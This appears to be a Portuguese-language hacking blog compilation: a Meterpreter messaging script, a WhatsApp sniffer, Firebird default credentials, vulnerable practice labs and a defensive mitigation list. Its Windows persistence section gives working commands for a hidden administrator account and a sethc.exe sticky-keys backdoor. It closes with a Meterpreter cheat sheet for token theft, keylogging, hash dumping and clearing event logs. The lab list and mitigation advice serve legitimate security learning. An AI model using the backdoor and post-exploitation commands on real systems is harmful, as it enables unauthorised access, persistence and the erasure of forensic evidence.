Script para enviar mensagem remota pelo Meterpreter

Vamos começar uma introdução ao desenvolvimento de scripts Meterpreter. É realmente interessante para ser capaz de entender como esses scripts são feitas para aumentar as tarefas disponíveis e personalizá-las, se você precisar dele em um teste de penetração. Neste artigo, apresentamos o conceito de Mixins, que facilitam a interação com o agente remoto (que injeta Meterpreter memória na máquina remota).

Mixins

Mixins são uma série de chamadas que representam tarefas comuns e mais utilizadas no desenvolvimento de scripts Meterpreter. Assim é simplificada e muito a interação com o agente remoto. Há um número de Mixins, embora em artigo de hoje, utilizar uma das cmd_exec mais básico e usado. Este mixim executa uma cmd em uma ordem especifica , assim, sera executado o cmd na máquina violada e o resultado é mostrado na máquina do atacante.

Código de hoje:

#Autor: Pablo Gonzalez
#Windows Mensaje cmd remoto
opts = Rex::Parser::Arguments.new(
“-h” => [false, “Help menu.”],
“-s” => [true, “Mostrar mensaje en remoto”]
)

opts.parse(args) { |opt, idx, val|
print_line “val: #{val}”
print_line “idx: #{idx}”
print_line “opt: #{opt}”
case opt
when “-h”
print_line “Ayuda de mi script de Meterpreter”
print_line “Meterpreter RuLeZ”
print_line(opts.usage)
raise Rex::Script::Completed
when “-s”
if val != nil
cmd_exec(‘cmd /c’,”msg * #{val}”)
end
end
}

if client.platform !~ /win32|win64/
print_line “No compatible”
raise Rex::Script::Completed
else
print_status(“Hecho”)
end

 

Os parâmetros para este script são -h y -s, com-h exibe um menu de ajuda para relatar as possibilidades que o script faz. O parâmetro-s é usada para receber uma mensagem que será lançado por meio de um mixin em máquina remota violados. O cmd_exec mixin é usado, o que permite que as ordens para lançar um cmd na máquina remota. A sintaxe é simples cmd_exec mixin, o primeiro parâmetro indica que o aplicativo ou processo está lançado, e o segundo parâmetro dá o comando para executar o aplicativo.

 

when “-s”
if val != nil
cmd_exec(‘cmd /c’,”msg * #{val}”)
end
end
}

Porva de script

Você pode ver a execução do script de saída resultante usando o run <ruta script>. Você pode ver a ajuda de script na imagem a seguir. Pode ser visto como o parâmetro -s exige a inserção de uma string, que é exibida no computador remoto como um pop-up.

Na siguinte imagen se pode visualizar a execução do script con o parámetro -s.

E depois de executar o script com a mensagem desejada, temos:

Por Flu-project

Capturando conversas do WhatsApp

WhatsAppSniffer de DecibelioApps é uma ferramenta para aparelhos Android com rooteados busybox para capturar e ler conversas WhatsApp em uma rede sem fio. Isso inclui textos, fotos, vídeos e até mesmo coordenadas.

 

 

Criado para demonstrar a insegurança de comunicações WhatsApp, é só usar o tcpdump para capturar pacotes de filtragem de rede Wi-Fi como a fonte ou WhatsApp servidores de destino.

Embora todas as mensagens capturadas estão em texto simples, sem nada de decodificação e atender jurídico definido termos WhatsApp (3.C: “Enquanto nós não proibir o uso de sniffers como o Ethereal, tcpdump ou HttpWatch em geralmente, nós vamos todos os esforços para não permitir a engenharia reversa nosso sistema, nossos protocolos, ou explorar fora dos limites dos pedidos comuns feitas por clientes WhatsApp …. “) A APK já foi retirado do mercado é o Google Play.Aunque facilmente fazer o download da aplicação de qualquer espelho …

Para WPA/WPA2 arpspoof redes criptografadas opcionalmente usado e não há uma versão gratuita que permite gravar até três conversas.

Fonte:Hackplayers

Estratégias para mitigar intrusões direcionadas

Excelente texto do Sandro Suffert

Apesar de sabermos que vulnerabilidades em aplicações (SQL Injection, Cross Site Scripting, etc..) são muito exploradas por adversários, o caminho mais fácil para invadir uma empresa é explorar seu elo mais fraco: o usuário

O vídeo abaixo, da Silicium Sec, demonstra visualmente a facilidade de se obter sucesso com um ataque deste tipo (são mostrados 5 passos):

Além de explorar os usuários – que devem ser treinados para se conscientizar destes riscos e serem capazes de reagir adequadamente a este tipo de ataque – os atacantes contam também com a falta de preparo de administradores de T.I. e times de Segurança da Informação.

Mas afinal, o que as empresas devem fazer para que não sejam vítimas deste tipo de ataque?

O governo australiano,  através de seu “Defence Signals Dictorate” acaba de divulgar um update para a lista de “Top 35 Mitigation Strategies” com algumas mudanças na priorização na “efetividade” das estratégias recomendadas de mitigação – vale a pena conferir e considerar na priorização de ações de defesa.
A tabela disponibilizada são medidos várias características da estratégia, incluindo “Efetividade Global de Segurança“, a “Resistência dos Usuários“, os “Custos de Implementação”, os “Custos de Manutenção” e também se: a estratégia Previne e/ou Detecta a intrusão; e se ajuda a mitigar quais estágios da intrusão.
HTML /Tabela (PNG) / PDF
As dez estratégias de defesa mais eficientes:
  1. Whitelisting de Aplicações
  2. Patching de Aplicações
  3. Patching de Sistemas Operacionais
  4. Minimizar os usuários com permissões administrativas locais ou de domínio
  5. Desabilitar contas de administrador locais
  6. Autenticação de múltiplos fatores
  7. Segmentação e segregação de redes
  8. Firewall de Aplicação em Estações de trabalho para negar tráfico ‘entrante
  9. Firewall de Aplicação em Estações de trabalho para negar tráfico ‘sainte
  10. Sistema Virtualizado não persistente para atividades arriscadas como leitura de email e navegação na internet.

 

Veja todas as 35 estratégias no site oficial – Top 35 Mitigation Strategies.

 

Extensões do Google Chrome pra pentest em aplicações web

Pequena lista de extensões interessantes e úteis que podem ajudar a muitos de nós, quando estamos a fazer um pentest.

XSS RAYS:

Ferramenta objetiva que verifica a existência de vulnerabilidades XSS e encontra como um site está  filtrando código, e também comprova se á injeções e inspeciona objetos.

Adicionar ao Google ChromeClique Aqui!

GOOGLE HACK DATA BASE:


Esta aplicação permite uma melhor compreensão da segurança web base. Para encontrar a descrição de uma vulnerabilidade, clique em “Pesquisar” no http://www.exploit-db.com. O aplicativo oferece a capacidade de busca de vulnerabilidades no site especificado. Basta clicar no botão de busca e digite o nome do site.

Adicionar ao Google ChromeClique Aqui!

WEBSECURIFY SCANNER:

Websecurify é uma solução avançada de teste construído para identificar com rapidamente e precisão os problemas de segurança em aplicações web. Websecurify você economiza tempo e dinheiro automatizando a técnica usada por especialistas para encontrar vulnerabilidades.

Adicionar ao Google ChromeClique Aqui!

HPP FINDER:

HPP Finder é uma extensão do Chrome concebido para detectar tentativas de HPP. HPP Finder pode detectar formas de URLs e HTML.
HTTP Parameter Pollution (HPP) é uma técnica de exploração web recentemente descoberto. Por favor, leia o documento NDSS 2010 para obter mais detalhes técnicos sobre.

Adiciona ao Google ChromeClique Aqui!

FORM FUZZER:

Este é um teste de fuzz, utilitário criado para ajudar a preencher formulários na web com alguns dados aleatórios.

Adicionar ao Google ChromeClique Aqui!

SITE SPIDER:

Use essa extensão para encontrar links quebrados em um site. Você pode restringir o spidering para um diretório de domínio, ou qualquer outra expressão regular. Aspider pode seguir um link mais longe do que esta restrição, permitindo encontrar links externos quebrados.

Adicionar ao Google ChromeClique Aqui!

XSS CHEF:

Sempre que você encontrar uma vulnerabilidade de XSS a extensão do Chrome, o chef vai facilitar a exploração.

Adicionar ao Google Chrome :   Clique Aqui!

Fonte:Secmaster

Explorando vulnerabilidade: Firebird Database Default Credentials

Firebird Database Tools

There are plenty of tools to interact with Firebird. Most commonly that can be grouped into either a client or a Database management tool. We’ll look at one of each.

FlameRobin (Client)

FlameRobinis a database administration tool for Firebird RDBMS. Their goal is to build a tool that is:

  • lightweight (small footprint, fast execution)
  • cross-platform (Linux, Windows, Mac OS X, FreeBSD, Solaris)
  • dependent only on other Open Source software”

–Source: http://www.flamerobin.org/

It is easily installed on BackTrack (or other distros that utilize apt):
<

 root@bt:~# apt-get install flamerobin

To run, launch X windows and type:

 root@bt:~# flamerobin

You may get the following error message, ignore it and continue:

 root@bt:~# The configuration file:
/root/.flamerobin/fr_databases.conf does not exist or cannot be opened.
This is normal for first time users.  You may now register new servers and databases.

nterrogating the Database

With access to the database, you can do any number of tasks. We'll look a couple to get you started. 

Retrieve Remote Server Version

Using FlameRobin, first “register” the remote server so you are able to communicate with it. First open the FlameRobin GUI, then goto Server -> Register Server -> and enter the following:
  • Display name: Friendly name to call the host, I use the IP
  • Hostname: Hostname or IP address
  • Port Number: will usually be 3050, however this instance is running on another port.
 

Registering the Server so we can communicate with it


 Next, right click on the server that you just registered, choose "Retrieve server version" and provide your credentials. The default firebird username and password is usually:

 Username: SYSDBA
 Password: masterkey



 You should be provided the version number as shown below:



Adding/Changing Users

Another useful task is to add or change user accounts. An interesting piece of information is that the Firebird database does not check any characters beyond 8 in a password. Thus the masterkey default password might as well be “masterke” as the ‘y’ at the end is never checked because it is beyond 8 characters. Additionally, usernames are not case sensitive, however passwords are CaSe SeNsItIvE.

With FlameRobin

Use the instructions above in the “Retrieve Remote Server Version” section in order to register the remote server if you have not done so already. Then right-click on the server that you just registered, select "Manage Users" and enter the SYSDBA credentials if they are not saved from the remote version enumeration above.



 To add a user, just click "Add User" and provide the required information! To modify other users (including changing their passwords) by clicking on the “details” icon which looks like a magnifying glass over a piece of paper.

Mantendo acesso no windows após ataque (basico)

não vou me dar ao trabalho de traduzir dessa vez, muitos jã conehcem essa técnica que é basica! A preguiça nao me deixou traduzir! hauaa desculpem pessoal!

We will discuss 2 most commonly used methods of maintaining access in windows usually called as Backdoors.

1. In the first technique, After getting access to the system we create user account with administrator privilege, thus intrusion again is easy. Use the following commands in the command prompt or you can execute it as a premade batch file.
net user /add "username" "password"
net localgroup administrators /add "username"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v username /t REG_DWORD /d 0
2. The second method is more efficient and it is a much secret approach. The method is behind the following vulnerability. In window before logging in, that is when the login screen shows up there is only one .exe file that can be execute. The File is named “sethc.exe” in the system32 directory. This file is used to switch on the sticky keys and can be invoked by pressing shift key 5 times.
What we do here is that we rename the “cmd.exe” in System32 directory to “sethc.exe”, so that command prompt opens with administrator privilege when shift is pressed 5 times. But renaming as such in system32 directory is not possible so we copy the cmd.exe to some other location, rename it  to “sethc.exe”and replace it with the old “sethc.exe”.
If you have administrator access to the account, execute the following command in cmd or as a batch file. You can also do it manually following the above steps, because it is just a rename and moving job.
takeown /f "C:\Windows\system32\sethc.exe"
cacls "C:\Windows\System32\sethc.exe" /e /p %username%:F
copy "C:\Windows\system32\cmd.exe" C:\Windows\"
rename "C:\Windows\cmd.exe" sethc.exe
rename "C:\Windows\system32\sethc.exe" sethc.exe.old
copy "C:\Windows\sethc.exe" "C:\Windows\system32\"
If you don’t have administrator access,  Boot off a windows recovery DVD, press Shift+F10 to spawn CMD, and type
copy "C:\Windows\system32\cmd.exe" C:\Windows\"
rename "C:\Windows\cmd.exe" sethc.exe
rename "C:\Windows\system32\sethc.exe" sethc.exe.old
copy "C:\Windows\sethc.exe" "C:\Windows\system32\"
Very similar to the other one, just you didn’t need to edit permissions.
Now you will notice at any time (even when nobody is logged in and when you’re at the welcome screen) you can spawn cmd as an administrator by pressing shift 5 times quickly.

 

Como executar scripts/exploits

Algumas pessoas ainda tem dificuldade de como executar scripts/exploits, então nesse post inaugural e talvez nos seguintes, estou pensando em postar coisas básicas pra depois irmos engrossando o caldo. Então Como executar scripts/exploits?Os scritps mais comuns que vocês podem encontrar são escritos em:

Linguagem – Extensão

Perl *.pl
Python *.py
Ruby *.rb
Shell Script *.sh
C *.c
java *.jar

Levando em conta que você já tem os interpretadores instalados, falta executar o script/exploit. Shell Script geralmente usa o interpretador bash, você já vai ter ele instalado no linux, os interpretadores de perl,python e c muitas vezes já vêm instalados, depende da distribuição linux que você está usando.

No prompt de comando:

Executando um script/exploit em perl:

perl nomedoexploit.pl

Executando um script/exploit em python:

python nomedoexploit.py

Executando um script/exploit em ruby:

Executando um script/exploit em shell:

./nomedoprograma.sh

Verificar se o script tem permissão de execução, para dar a permissão, use o comando:

chmod +x nomedoprograma.sh

Executando um script/exploit em c:

Na linguagem em c, temos que compilar o script para poder transformar ele num executável.

gcc nomedoexploit.c -o nomedesejado

Se o programa não contém erros, será criado um executável com o nome que você escolheu, agora você precisa executar ele.

./nomedesejado

Se der algum erro, é possível que o programa tenha herdado restrições de permissões quando foi criado, você tem que aplicar a permissão de execução.

chmod +x nomedesejado
./nomedesejado

Executando um script/exploit em java:

java -jar nomedesejado.jar

Cretidos: Animal

FOnte:ebr

Corporate Computer Security (3rd Edition) – Ideal para quem está começando na área

Corporate Computer Security (3rd Edition).

Foto da capa do livro Corporate Computer Security

O livro possui um pouco mais de 600 páginas, custa mais de US$ 120.00, isso sem contar o frete para o Brasil, mas vale cada centavo e minuto.

Posso dizer, sem medo algum, que os autores deste livro conseguiram juntar diferentes temas sobre segurança da informação que dará ao leitor um conhecimento intermediário.

Leis, normas, criptografia, técnicas de ataque e defesa. Esses são alguns dos tópicos que foram muito bem abordados.

Ao meu ver, o livro pecou em não falar sobre Web Application Firewall. Claro que vocês encontrarão outros temas, mas digo, ele vale e muito o investimento.

Como muitos não gostam de investir mais de US$ 100.00 em livros, segue o link para este livro e muito mais material que vocês poderão baixar… :)

 

Fonte:CorujadeTI

Montando um laboratorio completo para Pentest

Vou mostrar alguns recursos e distribuições para serem feitos testes de penetração, onde vocês pode usar as técnicas e  ferramentas de exploração em um ambiente totalmente seguro e legal. A maioria das distros são LiveCD e possui inúmeras vulnerabilidades, onde pode ser usadas para ataques de exploração web, enumeração, cracking, forense, engenharia reversa, penetração e etc…

Atualizado em 19/02/2012

WebGoat

WebGoat é uma aplicação web J2EE deliberadamente insegura mantido pela OWASP projetado para ensinar lições de segurança em aplicações web. Em cada aula, os usuários devem demonstrar o seu entendimento de uma questão de segurança, explorando uma vulnerabilidade real na aplicação WebGoat. Por exemplo, em uma das lições que o usuário deve usar a injeção SQL para roubar números de cartão de crédito falso. O aplicativo é um ambiente de ensino realista, proporcionando aos usuários com dicas e códigos para explicar melhor a lição.

http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

UltimateLAMP

UltimateLAMP é uma máquina virtual rodando Ubuntu contendo serviços vulneráveis ​​e contas fracas.

A VM UltimateLAMP executa os seguintes serviços: Postfix, Apache, MySQL, WordPress, TextPattern, Seredipity, MediaWiki, TikiWiki, PHP, Gallery, Moodle, PHPWebSite, Joomla, eGroupWare, Drupal, Php Bulletin Board, Sugar CRM, Owl, WebCalendar, Dot project, PhpAdsNew, Bugzilla, OsCommerce, ZenCart, PhphMyAdmin, Webmin,Mutillidae 1.5 (OWASP Top 10 Vulns)

http://ronaldbradford.com/tmp/UltimateLAMP-0.2.zip

Holynix

Semelhante ao de-ice Cd’s e pWnOS, holynix é uma imagem vmware do ubuntu server que foi deliberadamente construída para ter falhas de segurança para fins de testes de penetração.Cheio de falhas e de obstáculos, que são encontradas no mundo real.
http://pynstrom.net/holynix.php

WackoPicko

WackoPicko é um site que contém vulnerabilidades conhecidas. Foi usado pela primeira vez para o papel Pentest: Uma Análise da black-bom e Web Vulnerability Scanner.
http://cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf
https://github.com/adamdoupe/WackoPicko

De-ICE PenTest LiveCDs

Os LiveCDs pentest são a criação de Thomas Wilhelm, que foi transferido para uma equipe de teste de penetração na empresa onde trabalhava. Precisando de aprender muito sobre como os testes de penetração tão rapidamente quanto possível, Thomas começou a olhar para ambos os instrumentos e objectivos. Ele encontrou uma série de ferramentas, mas não metas utilizáveis para praticar contra. Eventualmente, em uma tentativa de reduzir o fosso de aprendizagem, Thomas criou cenários pentest usando LiveCDs.
http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks

Metasploitable

Metasploitable é um Ubuntu 8.04 instalado em um servidor de 6,5 de uma imagem VMWare. Um número de pacotes vulneráveis são incluídas, incluindo uma instalação de Tomcat 5.5 (com credenciais fraca), distcc, tikiwiki, twiki, e um velho mysql.
http://blog.metasploit.com/2010/05/introducing-metasploitable.html

Owaspbwa

Open Web Application Security Project (OWASP) Broken Aplicações Web Project, uma coleção de aplicativos web vulnerável.
http://code.google.com/p/owaspbwa/

Web Security Dojo

Um open-source independente do ambiente de formação para os testes de penetração da Web Application Security. Tools + Targets = Dojo
Diversas ferramentas de segurança de aplicações web e aplicações web de teste vulneráveis foram adicionados a uma instalação limpa do Ubuntu v10.04.1, que é corrigida com as atualizações adequadas e adições VM para fácil utilização.
http://www.mavensecurity.com/web_security_dojo/

Lampsecurity

Formação AMPSecurity é projetado para possuir uma série de vunerabilidade, criada em uma imagens de máquinas virtuais juntamente com a documentação completa, projetado para ensinar Linux, Apache, php, segurança mysql.
http://sourceforge.net/projects/lampsecurity/files/

Damn Vulnerable Web App (DVWA)

Damn Vulnerable Web App é um PHP/MySQL aplicação web, que é totalmente vulneráveis. Seus principais objetivos são para ajudar os profissionais de segurança para testar suas habilidades e ferramentas em um ambiente legal, ajudar os desenvolvedores web a entender melhor os processos de segurança de aplicações web e ajuda os professores / para ensinar alunos / aprender de segurança de aplicativos web em um ambiente de sala de aula.
http://www.dvwa.co.uk/

Hacking-Lab

Este é o Hacking-Lab projeto LiveCD. Ele está atualmente no estagio beta. O Live-CD é um ambiente de cliente padrão para resolver nossos desafios wargame Hacking-Lab do controle remoto.
http://www.hacking-lab.com/hl_livecd/

Moth

Moth é uma imagem do VMware com um conjunto de aplicativos da Web e vulneráveis scripts, que você pode utilizar para:
1. Testing Web Application Security Scanners
2. Testing Static Code Analysis tools (SCA)
3. Giving an introductory course to Web Application Security
http://www.bonsai-sec.com/en/research/moth.php

Damn Vulnerable Linux (DVL)

Damn Vulnerable Linux é uma distribuição Linux toda ruim. Seus desenvolvedores gastaram horas enchendo-o de vulnerabilidades, mal-configuração, desatualização e software exploráveis que o torna vulnerável a ataques. DVL não é feito para correr em sua área de trabalho – é uma ferramenta de aprendizagem para os estudantes de segurança.
http://www.damnvulnerablelinux.org/

pWnOS

pWnOS está em um “VMImage”, que cria uma meta para a prática de testes de penetração, com o “objetivo final” é fazer de raiz. Ele foi projetado para praticar o uso de exploits, com múltiplos pontos de entrada.
http://www.krash.in/bond00/pWnOS%20v1.0.zip

Virtual Hacking Lab

Um mirror deliberadamente de aplicações inseguras e softwares antigos com vulnerabilidades conhecidas. Usado para a prova de conceito / treinamento / segurança afins de aprendizagem. Disponível em imagens virtuais ou iso vivo(liveCD) ou formatos autônomo.
http://sourceforge.net/projects/virtualhacking/files/

BodgeIt Store

A BodgeIt Store é uma aplicação web vulnerável, que é atualmente destinado a pessoas que são novas para pen testing.

http://code.google.com/p/bodgeit/

Badstore

Badstore.net é dedicado a ajudar você a entender como os hackers atacam vulnerabilidades em aplicações Web, e mostrando-lhe como reduzir a sua exposição.
http://www.badstore.net/

Katana

Katana é uma suíte de segurança portátil multi-boot, que reúne muitas das distribuições de hoje, melhor segurança e aplicações portáteis para fugir de um único Flash Drive. Ele inclui as distribuições que focam Pen-Teste, Auditoria, Perícias, recuperação do sistema, análise da rede e remoção de malware. Katana também vem com mais de 100 aplicações portáteis do Windows, tais como Wireshark, Metasploit, NMAP, Cain & Abel, e muitos mais.
http://www.hackfromacave.com/katana.html

Hackademic Challenges

A OWASP Hackademic Desafios, é um projeto open source que pode ser usado para testar e melhorar o conhecimento do sistema de informação e segurança de aplicações web. A OWASP Hackademic tem Desafios implementar em cenários realistas, com vulnerabilidades conhecidas em um ambiente seguro e controlável. Os usuários podem tentar descobrir e explorar essas vulnerabilidades, a fim de aprender conceitos importantes de segurança da informação através da perspectiva do invasor.

http://www.hackademic.eu/

Exploit.co.il Vulnerable Web App

Exploit.co.il Vulnerable Web app concebido como uma plataforma de aprendizagem para testar diferentes técnicas de injeção SQL Este é um site totalmente funcional com um sistema de gerenciamento de conteúdo baseado em fckeditor. Você pode baixá-lo como código fonte ou uma pré-configurado.

http://sourceforge.net/projects/exploitcoilvuln/


Gruyere

Este codelab mostra como vulnerabilidades de aplicativos web podem ser exploradas e como se defender contra esses ataques. A melhor maneira de aprender é fazendo as coisas, então você vai ter a chance de fazer alguns testes de penetração real, na verdade, de exploração de uma aplicação real. Especificamente, você aprenderá o seguinte:
Como uma aplicação pode ser atacado com vulnerabilidades de segurança comum da web, como vulnerabilidades cross-site scripting (XSS) e de falsificação de cross-site pedido (XSRF).
Como encontrar, corrigir e evitar essas vulnerabilidades comuns e outros bichos que têm um impacto de segurança, como a negação de serviço, divulgação de informações ou a execução remota de código.
Para tirar o máximo proveito deste laboratório, você deve ter alguma familiaridade com a forma como funciona uma aplicação web (por exemplo, o conhecimento geral do HTML, templates, cookies, AJAX, etc.)

http://google-gruyere.appspot.com/

Kioptrix

Este Kioptrix VM Imagem são desafios fáceis. O objetivo do jogo é adquirir acesso root via todos os meios possíveis (exceto realmente hackear o servidor VM ou player).
O objetivo destes jogos são para aprender as ferramentas e técnicas básicas de vulnerabilidade, avaliação e exploração. Há maneiras mais de um para completar com sucesso os desafios.

http://www.kioptrix.com/blog/?page_id=135

NETinVM

NETinVM é uma única imagem de máquina virtual VMware que contém, pronto para ser executado, uma série de User-Mode Linux (UML) de máquinas virtuais que, quando iniciado, conformam uma rede de computador inteiro dentro da máquina virtual VMware. Daí NETinVM o nome, um acrônimo para Rede no Virtual Machine. NETinVM foi concebido principalmente como uma ferramenta educacional para ensinar e aprender sobre sistemas operacionais, redes de computadores e segurança do sistema e de rede, mas outros usos são certamente possível.

http://informatica.uv.es/~carlos/docencia/netinvm/

SecuriBench

Stanford SecuriBench é um conjunto de programas da vida real fonte aberto para ser usado como um campo de testes para as ferramentas de segurança dinâmica e estática. Release 0,91 uma foca aplicativos da Web baseados em Java.

Estas aplicações sofrem de uma variedade de vulnerabilidades, incluindo

ataques de injeção SQL
Cross-site scripting ataques
ataques HTTP divisão
ataques Path Traversal

http://suif.stanford.edu/~livshits/securibench/

WebMaven

WebMaven (mais conhecido como Banco Buggy) foi um ambiente de aprendizagem interativa para segurança de aplicações web. É emulado várias falhas de segurança para o usuário a encontrar. Esta usuários habilitados para a prática segura e legal aplicação web técnicas de avaliação de vulnerabilidade. Além disso, os usuários poderiam avaliação comparativa das suas ferramentas de auditoria de segurança para garantir que eles executam como anunciado.

http://www.mavensecurity.com/WebMaven/

OWASP Vicnum Project

A flexibilidade da aplicação web, mostrando as vulnerabilidades como cross site scripting, injeções de SQL, e questões de gestão de sessão. Útil para aperfeiçoar as habilidades de TI auditores de segurança web e criação de “capture the flag”. Jogue o jogo em http://vicnum.ciphertechs.com

https://sourceforge.net/projects/vicnum/


Hackxor

Hackxor é um jogo de hacking webapp onde os jogadores devem localizar e explorar vulnerabilidades para o progresso através da história. Pense WebGoat mas com um enredo e um foco no realismo e dificuldade. Contém XSS, CSRF, SQLI, redos, DOR, injeção de comandos, etc

Fonte: Bhior

Meterpreter Commands

Aqui está uma lista com todos os comandos Meterpreter que podem ser usados ​​para a exploração post em um teste de penetração.

help

Open Meterpreter usage help

run scriptname

Run Meterpreter-based scripts; for a full list check the scripts/meterpreter
directory

sysinfo

Show the system information on the remote target

ls

List the files and folders on the target

use priv

Load the privilege extension for extended Meterpreter libraries

ps

Show all running processes and which accounts are associated with each process

migrate PID

Migrate to the specific process ID (PID is the target process ID gained
from the ps command)

use incognito

Load incognito functions. (Used for token stealing and impersonation on
a target machine)

list_tokens -u

List available tokens on the target by user

list_tokens -g

List available tokens on the target by group

impersonate_token DOMAIN_NAME\\USERNAME

Impersonate a token available on the target

steal_token PID

Steal the tokens available for a given process and impersonate that token

drop_token

Stop impersonating the current token

getsystem

Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors

shell

Drop into an interactive shell with all available tokens

execute -f cmd.exe -i

Execute cmd.exe and interact with it

execute -f cmd.exe -i -t

Execute cmd.exe with all available tokens

execute -f cmd.exe -i -H -t

Execute cmd.exe with all available tokens and make it a hidden process

rev2self

Revert back to the original user you used to compromise the target

reg command

Interact, create, delete, query, set, and much more in the target’s registry

setdesktop number

Switch to a different screen based on who is logged in

screenshot

Take a screenshot of the target’s screen

upload file

Upload a file to the target

download file

Download a file from the target

keyscan_start

Start sniffing keystrokes on the remote target

keyscan_dump

Dump the remote keys captured on the target

keyscan_stop

Stop sniffing keystrokes on the remote target

getprivs

Get as many privileges as possible on the target

uictl enable keyboard/mouse

Take control of the keyboard and/or mouse

background

Run your current Meterpreter shell in the background

hashdump

Dump all hashes on the target

use sniffer

Load the sniffer module

sniffer_interfaces

List the available interfaces on the target

sniffer_dump interfaceID pcapname

Start sniffing on the remote target

sniffer_start interfaceID packet-buffer

Start sniffing with a specific range for a packet buffer

sniffer_stats interfaceID

Grab statistical information from the interface you are sniffing

sniffer_stop interfaceID

Stop the sniffer

add_user username password -h ip

Add a user on the remote target

add_group_user “Domain Admins” username -h ip

Add a username to the Domain Administrators group on the remote target

clearev

Clear the event log on the target machine

timestomp

Change file attributes, such as creation date (antiforensics measure)

reboot

Reboot the target machine